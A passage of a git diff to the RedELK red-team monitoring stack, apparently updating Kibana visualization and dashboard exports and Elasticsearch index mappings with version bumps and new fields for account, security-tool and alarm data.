"2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": { "visualization": "7.14.0" @@ -1327,8 +1327,8 @@ } ], "sort": [ - 1642152856829, - 2229 + 1645363346672, + 1179 ], "type": "visualization", "version": "1" @@ -1393,7 +1393,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1406,8 +1406,8 @@ } ], "sort": [ - 1642152856829, - 2231 + 1645363346672, + 1181 ], "type": "visualization", "version": "1" @@ -1472,7 +1472,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1485,8 +1485,8 @@ } ], "sort": [ - 1642152856829, - 2233 + 1645363346672, + 1183 ], "type": "visualization", "version": "1" @@ -1626,7 +1626,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1639,8 +1639,8 @@ } ], "sort": [ - 1642152856829, - 2235 + 1645363346672, + 1185 ], "type": "visualization", "version": "1" @@ -1703,7 +1703,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1716,8 +1716,8 @@ } ], "sort": [ - 1642152856829, - 2237 + 1645363346672, + 1187 ], "type": "visualization", "version": "1" @@ -1748,15 +1748,15 @@ "type": "markdown" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": { "visualization": "7.14.0" }, "references": [], "sort": [ - 1642152856829, - 2238 + 1645363346672, + 1188 ], "type": "visualization", "version": "1" @@ -1822,7 +1822,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1835,8 +1835,8 @@ } ], "sort": [ - 1642152856829, - 2240 + 1645363346672, + 1190 ], "type": "visualization", "version": "1" @@ -1929,7 +1929,7 @@ "type": "input_control_vis" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -1957,8 +1957,8 @@ } ], "sort": [ - 1642152856829, - 2245 + 1645363346672, + 1195 ], "type": "visualization", "version": "1" @@ -2023,7 +2023,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2036,8 +2036,8 @@ } ], "sort": [ - 1642152856829, - 2247 + 1645363346672, + 1197 ], "type": "visualization", "version": "1" @@ -2102,7 +2102,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2115,8 +2115,8 @@ } ], "sort": [ - 1642152856829, - 2249 + 1645363346672, + 1199 ], "type": "visualization", "version": "1" @@ -2182,7 +2182,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2195,8 +2195,8 @@ } ], "sort": [ - 1642152856829, - 2251 + 1645363346672, + 1201 ], "type": "visualization", "version": "1" @@ -2265,7 +2265,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2278,8 +2278,8 @@ } ], "sort": [ - 1642152856829, - 2253 + 1645363346672, + 1203 ], "type": "visualization", "version": "1" @@ -2341,7 +2341,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2354,8 +2354,8 @@ } ], "sort": [ - 1642152856829, - 2255 + 1645363346672, + 1205 ], "type": "visualization", "version": "1" @@ -2424,7 +2424,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2437,8 +2437,8 @@ } ], "sort": [ - 1642152856829, - 2257 + 1645363346672, + 1207 ], "type": "visualization", "version": "1" @@ -2503,7 +2503,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2516,8 +2516,8 @@ } ], "sort": [ - 1642152856829, - 2259 + 1645363346672, + 1209 ], "type": "visualization", "version": "1" @@ -2659,7 +2659,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2672,8 +2672,8 @@ } ], "sort": [ - 1642152856829, - 2261 + 1645363346672, + 1211 ], "type": "visualization", "version": "1" @@ -2784,7 +2784,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -2802,8 +2802,8 @@ } ], "sort": [ - 1642152856829, - 2264 + 1645363346672, + 1214 ], "type": "visualization", "version": "1" @@ -2868,7 +2868,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "88db1280-d024-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2881,8 +2881,8 @@ } ], "sort": [ - 1642152856829, - 2266 + 1645363346672, + 1216 ], "type": "visualization", "version": "1" @@ -2951,7 +2951,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -2964,8 +2964,8 @@ } ], "sort": [ - 1642152856829, - 2268 + 1645363346672, + 1218 ], "type": "visualization", "version": "1" @@ -3050,7 +3050,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "a5554e20-d025-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3063,8 +3063,8 @@ } ], "sort": [ - 1642152856829, - 2270 + 1645363346672, + 1220 ], "type": "visualization", "version": "1" @@ -3204,7 +3204,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "ab609c60-d319-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3217,8 +3217,8 @@ } ], "sort": [ - 1642152856829, - 2272 + 1645363346672, + 1222 ], "type": "visualization", "version": "1" @@ -3280,7 +3280,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "abdcd940-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3293,8 +3293,8 @@ } ], "sort": [ - 1642152856829, - 2274 + 1645363346672, + 1224 ], "type": "visualization", "version": "1" @@ -3450,7 +3450,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3463,8 +3463,8 @@ } ], "sort": [ - 1642152856829, - 2276 + 1645363346672, + 1226 ], "type": "visualization", "version": "1" @@ -3530,7 +3530,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3543,8 +3543,8 @@ } ], "sort": [ - 1642152856829, - 2278 + 1645363346672, + 1228 ], "type": "visualization", "version": "1" @@ -3609,7 +3609,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3622,8 +3622,8 @@ } ], "sort": [ - 1642152856829, - 2280 + 1645363346672, + 1230 ], "type": "visualization", "version": "1" @@ -3799,7 +3799,7 @@ "type": "line" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "be08d380-efe9-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -3812,8 +3812,8 @@ } ], "sort": [ - 1642152856829, - 2282 + 1645363346672, + 1232 ], "type": "visualization", "version": "1" @@ -3914,7 +3914,7 @@ "type": "table" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "cbb7d710-efee-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -3927,8 +3927,8 @@ } ], "sort": [ - 1642152856829, - 2284 + 1645363346672, + 1234 ], "type": "visualization", "version": "1" @@ -4004,7 +4004,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "ce581930-d361-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4017,8 +4017,8 @@ } ], "sort": [ - 1642152856829, - 2286 + 1645363346672, + 1236 ], "type": "visualization", "version": "1" @@ -4081,7 +4081,7 @@ "type": "input_control_vis" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4099,8 +4099,8 @@ } ], "sort": [ - 1642152856829, - 2289 + 1645363346672, + 1239 ], "type": "visualization", "version": "1" @@ -4194,7 +4194,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "d625ba60-efe8-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -4207,8 +4207,8 @@ } ], "sort": [ - 1642152856829, - 2291 + 1645363346672, + 1241 ], "type": "visualization", "version": "1" @@ -4273,7 +4273,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "dcf86190-d319-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4286,8 +4286,8 @@ } ], "sort": [ - 1642152856829, - 2293 + 1645363346672, + 1243 ], "type": "visualization", "version": "1" @@ -4417,7 +4417,7 @@ "type": "line" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -4430,8 +4430,8 @@ } ], "sort": [ - 1642152856829, - 2295 + 1645363346672, + 1245 ], "type": "visualization", "version": "1" @@ -4522,7 +4522,7 @@ "type": "tile_map" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -4535,8 +4535,8 @@ } ], "sort": [ - 1642152856829, - 2297 + 1645363346672, + 1247 ], "type": "visualization", "version": "1" @@ -4714,7 +4714,7 @@ "type": "horizontal_bar" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -4732,8 +4732,8 @@ } ], "sort": [ - 1642152856829, - 2300 + 1645363346672, + 1250 ], "type": "visualization", "version": "1" @@ -4890,7 +4890,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4903,8 +4903,8 @@ } ], "sort": [ - 1642152856829, - 2302 + 1645363346672, + 1252 ], "type": "visualization", "version": "1" @@ -4966,7 +4966,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4979,8 +4979,8 @@ } ], "sort": [ - 1642152856829, - 2304 + 1645363346672, + 1254 ], "type": "visualization", "version": "1" @@ -5042,7 +5042,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -5055,8 +5055,8 @@ } ], "sort": [ - 1642152856829, - 2306 + 1645363346672, + 1256 ], "type": "visualization", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json index 668a1be1..0427e51b 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json @@ -7,6 +7,46 @@ "_meta": {}, "_source": {}, "properties": { + "bluecheck": { + "properties": { + "accountname": { + "type": "text" + }, + "accountstate": { + "type": "text" + }, + "certissuer ": { + "type": "text" + }, + "certsubject": { + "type": "text" + }, + "message": { + "type": "text" + }, + "pwchangedate": { + "type": "date" + }, + "sectools": { + "properties": { + "ProcessID": { + "type": "text" + }, + "Product": { + "type": "text" + }, + "Vendor": { + "type": "text" + } + }, + "type": "nested" + }, + "sectoolsamount": { + "type": "integer" + } + }, + "type": "object" + }, "bluechecktimestamp": { "type": "text" }, diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json index a40920c4..accb9ff4 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json @@ -64,6 +64,31 @@ }, "alarm": { "properties": { + "alarm_httptraffic": { + "properties": { + "last_alarmed": { + "doc_values": true, + "ignore_malformed": false, + "index": true, + "store": false, + "type": "date_nanos" + }, + "last_checked": { + "type": "date_nanos" + } + }, + "type": "object" + }, + "last_alarmed": { + "type": "date_nanos" + }, + "last_checked": { + "doc_values": true, + "ignore_malformed": false, + "index": true, + "store": false, + "type": "date_nanos" + }, "timestamp": { "type": "date" } @@ -704,6 +729,9 @@ "ip": { "type": "ip" }, + "ip_otherproxies": { + "type": "text" + }, "port": { "type": "long" } diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson index d3ea8c37..d1b28665 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson @@ -1,12 +1,12 @@ -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\"},\"panelIndex\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_93f74516-7d73-4db3-8d64-589dfd7492b7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"66e33663-63c3-4e78-aa5d-725e33754c02\"},\"panelIndex\":\"66e33663-63c3-4e78-aa5d-725e33754c02\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_66e33663-63c3-4e78-aa5d-725e33754c02\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":8,\"h\":9,\"i\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},\"panelIndex\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":4,\"w\":8,\"h\":9,\"i\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\"},\"panelIndex\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_86117a55-669e-4d4d-a4d6-436da4f1a930\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":4,\"w\":8,\"h\":9,\"i\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\"},\"panelIndex\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_ab07bed8-9d4e-409c-b3db-d15124eb5467\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":4,\"w\":8,\"h\":9,\"i\":\"019655aa-c9de-444a-a4af-619b7297572b\"},\"panelIndex\":\"019655aa-c9de-444a-a4af-619b7297572b\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_019655aa-c9de-444a-a4af-619b7297572b\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":4,\"w\":16,\"h\":9,\"i\":\"43a0761e-49bc-4846-9956-04a604b063ec\"},\"panelIndex\":\"43a0761e-49bc-4846-9956-04a604b063ec\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_43a0761e-49bc-4846-9956-04a604b063ec\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":13,\"w\":8,\"h\":9,\"i\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},\"panelIndex\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":13,\"w\":8,\"h\":9,\"i\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\"},\"panelIndex\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e18544fe-ac30-43cf-891c-4448ffea6bbd\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":13,\"w\":16,\"h\":9,\"i\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},\"panelIndex\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Compromised realms\",\"panelRefName\":\"panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":13,\"w\":8,\"h\":9,\"i\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},\"panelIndex\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":40,\"y\":13,\"w\":8,\"h\":9,\"i\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\"},\"panelIndex\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_c15dc2cd-fad3-44a3-b127-1cd47d837740\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-12M", "timeRestore": true, "timeTo": "now", "title": "RedELK - Summary dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "93f74516-7d73-4db3-8d64-589dfd7492b7:panel_93f74516-7d73-4db3-8d64-589dfd7492b7", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "66e33663-63c3-4e78-aa5d-725e33754c02:panel_66e33663-63c3-4e78-aa5d-725e33754c02", "type": "visualization"}, {"id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "name": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3:panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "86117a55-669e-4d4d-a4d6-436da4f1a930:panel_86117a55-669e-4d4d-a4d6-436da4f1a930", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "ab07bed8-9d4e-409c-b3db-d15124eb5467:panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", "type": "visualization"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "019655aa-c9de-444a-a4af-619b7297572b:panel_019655aa-c9de-444a-a4af-619b7297572b", "type": "visualization"}, {"id": "ce581930-d361-11ea-9301-a30a04251ae9", "name": "43a0761e-49bc-4846-9956-04a604b063ec:panel_43a0761e-49bc-4846-9956-04a604b063ec", "type": "visualization"}, {"id": "57626ad0-d355-11ea-9301-a30a04251ae9", "name": "eab2038d-128a-4b5b-8a72-701fd3f53bd8:panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", "type": "visualization"}, {"id": "464660c0-d360-11ea-9301-a30a04251ae9", "name": "e18544fe-ac30-43cf-891c-4448ffea6bbd:panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d:panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "223951c1-7fe0-40f9-9a89-0c91aedd7fce:panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "c15dc2cd-fad3-44a3-b127-1cd47d837740:panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", "type": "visualization"}], "sort": [1642152857910, 2054], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},\"panelIndex\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":6,\"i\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\"},\"panelIndex\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Target host(s) and user(s) filter\",\"panelRefName\":\"panel_09cb7bd6-8162-4141-8a0c-807ee57a4603\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":12,\"h\":6,\"i\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},\"panelIndex\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per host\",\"panelRefName\":\"panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":2,\"w\":12,\"h\":6,\"i\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},\"panelIndex\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per user\",\"panelRefName\":\"panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":8,\"w\":48,\"h\":51,\"i\":\"30674424-d470-4b93-80c1-260d16f987ab\"},\"panelIndex\":\"30674424-d470-4b93-80c1-260d16f987ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_30674424-d470-4b93-80c1-260d16f987ab\"}]", "timeRestore": false, "title": "RedELK - Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757:panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", "type": "visualization"}, {"id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "name": "09cb7bd6-8162-4141-8a0c-807ee57a4603:panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", "type": "visualization"}, {"id": "632081a0-d02a-11ea-9301-a30a04251ae9", "name": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089:panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", "type": "visualization"}, {"id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "name": "47710d04-18f9-4563-bf0d-73b4dc24f9e5:panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", "type": "visualization"}, {"id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "name": "30674424-d470-4b93-80c1-260d16f987ab:panel_30674424-d470-4b93-80c1-260d16f987ab", "type": "search"}], "sort": [1642152857910, 2060], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},\"panelIndex\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":9,\"i\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},\"panelIndex\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Techniques, Tactics and Procedures\",\"panelRefName\":\"panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":18,\"i\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},\"panelIndex\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks per host and user\",\"panelRefName\":\"panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":24,\"h\":9,\"i\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},\"panelIndex\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Cobalt Strike tasks per 